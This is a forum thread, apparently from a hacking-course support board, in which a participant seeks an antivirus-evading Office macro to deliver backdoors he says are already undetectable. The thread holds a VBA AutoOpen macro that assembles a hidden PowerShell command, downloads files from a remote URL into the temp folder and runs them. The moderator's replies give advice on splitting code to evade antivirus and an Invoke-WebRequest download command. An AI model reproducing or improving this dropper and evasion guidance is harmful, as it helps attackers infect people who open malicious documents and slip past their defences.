Tagged: Generic Macro
- This topic has 3 replies, 2 voices, and was last updated 4 years, 4 months ago by Diego Pérez.
- AuthorPosts
- August 6, 2020 at 4:48 pm #43732y4gud007Participant
Hi
I would like to know if there is a way I could generate an undetected generic macro, A minimum of 9 antivirus keeps detecting the one used by Zaid in the social engineering course, no matter how much tweaking… meanwhile the 2 evil files embedded are 100% cleaned
Sub AutoOpen()
Dim sk As String
sk = “p”
sk = “o”
sk = sk + “w”
sk = sk + “er”
sk = sk + “s”
sk = sk + “he”
sk = sk + “ll ”
sk = sk + “-NoP -NonI -W Hidden “””sk = sk + “(‘https://blahblah’,’https://blahblah’)”
sk = sk + “|foreach{$fileName=$env:temp+’\’+(Split-Path -Path $_ -Leaf);”
sk = sk + “(new-object System.Net.WebClient).DownloadFile($_,$fileName);”
sk = sk + “Invoke-Item $fileName;}”
sk = sk + “”””
VBA.CreateObject(“WScript.Shell”).Run sk, 0
End Sub
August 7, 2020 at 3:56 am #43773Diego PérezModeratorHi!
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..So you need to keep trying different things, try to split it more.
Hope it helps!
DiegoAugust 8, 2020 at 4:23 am #43834y4gud007ParticipantHi Diego,
Thanks for your response,
I understood that we need to play around with backdoors to bypass AV, what I am asking is how to generate a generic VBA command/powershell code which I could use in Microsoft office macro to allows download and execution of external .exe file just like the above generic download and execute macro, instead of a payload that require us to listen back via empire, veil etc. I created my FUD .exe backdoors already, I only need a generic download and execute powershell/VBA script that would run the code when macro is enabled, The above generic download and execute macro used by Zaid in the course does not bypass AV anymore no matter how the tweaking, which is very normal considering the lecture recorded time.Is there a way I could get this done?
Thanks
August 9, 2020 at 3:51 am #43869Diego PérezModeratorHi!
That’s the proper way to use powershell to download and execute a file, you can try to use another option, using Invoke-WebRequest, but it also might be flaged by the AV.
The command would be:
powershell iwr -uri http://<your address here> -outfile <name of the file>Try using it.
Let me know how it goes!
Diego - AuthorPosts
- You must be logged in to reply to this topic.